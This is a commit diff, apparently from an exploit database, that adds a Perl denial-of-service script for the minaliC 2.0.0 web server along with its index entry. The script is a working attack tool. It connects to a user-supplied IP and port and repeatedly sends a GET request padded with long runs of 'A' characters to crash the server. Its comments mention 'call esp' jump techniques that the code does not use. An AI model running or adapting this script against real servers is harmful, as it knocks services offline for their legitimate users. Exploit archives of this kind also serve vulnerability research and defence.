DB: 2024-03-23
2 changes to exploits/shellcodes/ghdb minaliC 2.0.0 - Denied of Service
This commit is contained in:
parent
a24ba3c94b
commit
26a991fc28
2 changed files with 86 additions and 0 deletions
85
exploits/windows/remote/51917.pl
Executable file
85
exploits/windows/remote/51917.pl
Executable file
|
@ -0,0 +1,85 @@
|
||||||
|
#!/usr/bin/perl
|
||||||
|
|
||||||
|
|
||||||
|
use Socket;
|
||||||
|
|
||||||
|
# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)
|
||||||
|
# Discovery by: Fernando Mengali
|
||||||
|
# Discovery Date: 03 january 2024
|
||||||
|
# Vendor Homepage: http://minalic.sourceforge.net/
|
||||||
|
# Notification vendor: No reported
|
||||||
|
# Tested Version: minaliC 2.0.0
|
||||||
|
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
|
||||||
|
# Vulnerability Type: Denial of Service (DoS)
|
||||||
|
# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw
|
||||||
|
|
||||||
|
#1. Description
|
||||||
|
|
||||||
|
#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
|
||||||
|
#For this exploit I have tried several strategies to increase reliability and performance:
|
||||||
|
#Jump to a static 'call esp'
|
||||||
|
#Backwards jump to code a known distance from the stack pointer.
|
||||||
|
#The server did not properly handle request with large amounts of data via method GET to web server.
|
||||||
|
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.
|
||||||
|
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
|
||||||
|
|
||||||
|
#2. Proof of Concept - PoC
|
||||||
|
|
||||||
|
$sis="$^O";
|
||||||
|
|
||||||
|
if ($sis eq "windows"){
|
||||||
|
$cmd="cls";
|
||||||
|
} else {
|
||||||
|
$cmd="clear";
|
||||||
|
}
|
||||||
|
|
||||||
|
system("$cmd");
|
||||||
|
|
||||||
|
intro();
|
||||||
|
main();
|
||||||
|
|
||||||
|
print "[+] Exploiting... \n";
|
||||||
|
|
||||||
|
my $junk = "\x41" x 245;
|
||||||
|
|
||||||
|
my $host = "\x41" x 135;
|
||||||
|
my $i=0;
|
||||||
|
while ($i <= 3) {
|
||||||
|
my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";
|
||||||
|
|
||||||
|
my $sock;
|
||||||
|
socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";
|
||||||
|
|
||||||
|
my $addr = sockaddr_in($port, inet_aton($ip));
|
||||||
|
connect($sock, $addr);
|
||||||
|
|
||||||
|
send($sock, $buf, length($buf), 0);
|
||||||
|
|
||||||
|
$i++;
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
print "[+] Done - Exploited success!!!!!\n\n";
|
||||||
|
|
||||||
|
sub intro {
|
||||||
|
print "***************************************************\n";
|
||||||
|
print "* minaliC 2.0.0 - Denied of Service *\n";
|
||||||
|
print "* *\n";
|
||||||
|
print "* Coded by Fernando Mengali *\n";
|
||||||
|
print "* *\n";
|
||||||
|
print "* e-mail: fernando.mengalli\@gmail.com *\n";
|
||||||
|
print "* *\n";
|
||||||
|
print "***************************************************\n";
|
||||||
|
}
|
||||||
|
|
||||||
|
sub main {
|
||||||
|
|
||||||
|
our ($ip, $port) = @ARGV;
|
||||||
|
|
||||||
|
unless (defined($ip) && defined($port)) {
|
||||||
|
|
||||||
|
print " \nUsage: $0 <ip> <port> \n";
|
||||||
|
exit(-1);
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
|
@ -44421,6 +44421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
31345,exploits/windows/remote/31345.txt,"Microworld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",remote,windows,,2008-03-06,2014-02-02,1,CVE-2008-1221;OSVDB-43065,,,,,https://www.securityfocus.com/bid/28127/info
|
31345,exploits/windows/remote/31345.txt,"Microworld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",remote,windows,,2008-03-06,2014-02-02,1,CVE-2008-1221;OSVDB-43065,,,,,https://www.securityfocus.com/bid/28127/info
|
||||||
6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,remote,windows,,2008-09-08,,1,,,,,,
|
6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,remote,windows,,2008-09-08,,1,,,,,,
|
||||||
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,,2018-08-09,2018-08-09,0,,,,,,
|
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,,2018-08-09,2018-08-09,0,,,,,,
|
||||||
|
51917,exploits/windows/remote/51917.pl,"minaliC 2.0.0 - Denied of Service",2024-03-22,"Fernando Mengali",remote,windows,,2024-03-22,2024-03-22,0,,,,,,
|
||||||
15333,exploits/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",remote,windows,,2010-10-27,2010-10-27,1,OSVDB-68880,,,http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-10-27-at-52840-pm.png,,
|
15333,exploits/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",remote,windows,,2010-10-27,2010-10-27,1,OSVDB-68880,,,http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-10-27-at-52840-pm.png,,
|
||||||
15336,exploits/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,remote,windows,,2010-10-27,2017-10-27,1,,,,,,
|
15336,exploits/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,remote,windows,,2010-10-27,2017-10-27,1,,,,,,
|
||||||
17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows,,2011-07-27,2011-07-29,1,OSVDB-74149,,,,http://www.exploit-db.comminalic.zip,
|
17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows,,2011-07-27,2011-07-29,1,OSVDB-74149,,,,http://www.exploit-db.comminalic.zip,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue